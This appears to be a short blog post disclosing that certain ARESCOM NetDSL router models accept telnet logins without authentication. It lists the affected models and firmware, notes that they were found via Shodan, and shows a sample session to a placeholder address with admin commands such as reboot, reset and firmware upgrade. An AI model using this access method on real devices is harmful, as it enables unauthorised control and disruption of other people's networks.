ARESCOM NetDSL Routers Unauthenticated Telnet Access

From an older saved Shodan search it looks like ARESCOM routers don’t require authentication for telnet! You can do a lot of commands including reboot, disconnect from the ISP and more!

Confirmed:
Model: NDS1260HE-TLI (Hardware) Version: 6.0.27 (Software version)
Model: ND1060VE-TLI (Hardware) Version: 5.3.21B (Software version)

df:~ # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

NDS1260HE-TLI Copyright by ARESCOM 2002

Login Success!
NetDSL>?

******* Console Help Menu *******
Available Command:

add add objects in table
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM

NetDSL>show sysinfo

Vendor: Arescom
Model: NDS1260HE-TLI (Hardware)
Version: 6.0.27 (Software version)
UpTime: 0293:28 (hh:mm)

NetDSL>

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: